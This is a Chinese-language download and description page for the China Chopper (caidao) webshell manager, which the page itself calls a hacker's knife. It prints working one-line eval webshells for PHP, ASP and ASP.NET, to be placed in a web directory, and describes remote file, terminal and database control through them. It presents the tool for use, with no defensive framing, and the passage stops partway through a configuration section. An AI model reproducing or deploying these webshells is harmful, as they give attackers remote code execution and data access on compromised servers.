最新中国菜刀caidao-20160620下载和说明

0x00 中国制造, 黑客之刀

中国菜刀是中国安全圈内使用非常广泛的一款Webshell管理工具，此次老兵大牛进行了更新，界面更加优美，功能更加丰富，有图有真相！

0x01 验证

此次更新还自带了官网验证功能，妈妈再也不会担心我的webshell了。

0x02 软件说明

菜刀 / Caidao @ http://www.maicaidao.com/

1	菜刀，他是一款专业的网站管理工具

一、网站管理模块

（1）放在网站上的脚本程序分两种

1.1）“一句话(Eval)”：

PHP, ASP, ASP.NET 的网站都可以，支持https。下面的代码放在网站目录即可开始管理，比FTP好用多了是不是：

1 2 3

PHP:    <?php @ eval ( $_POST [ 'caidao' ]);?> ASP:    <% eval request( "caidao" )%> ASP.NET:    <%@ Page Language= "Jscript" %><% eval (Request.Item[ "caidao" ], "unsafe" );%>

1.2）自己开发的脚本程序(Customize)：

理论上支持所有动态脚本,只要正确与菜刀进行交互即可。调用方法请参阅后面的 “Customize模式菜刀和服务端通信接口”。

（2）常用功能介绍

1 2 3 4 5 6 7 8 9 10 11 12 13

2.1）文件管理：[特色]缓存下载目录，并支持离线查看缓存目录;   2.2）虚拟终端：[特色]人性化的设计，操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份，分别提交。   2.3）数据库管理：[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL,ACCESS, 以及支持ADO方式连接的数据库。   2.4) 自写脚本（只有Eval端才支持）：            通过简单编码后提交用户自己的脚本到服务端执行，实现丰富的功能，也可选择发送到浏览器执行。            如果要写自己的CCC脚本，可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。            可以在官网下载别人的CCC脚本，或分享你的得意之作。

（3）配置框填写说明

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44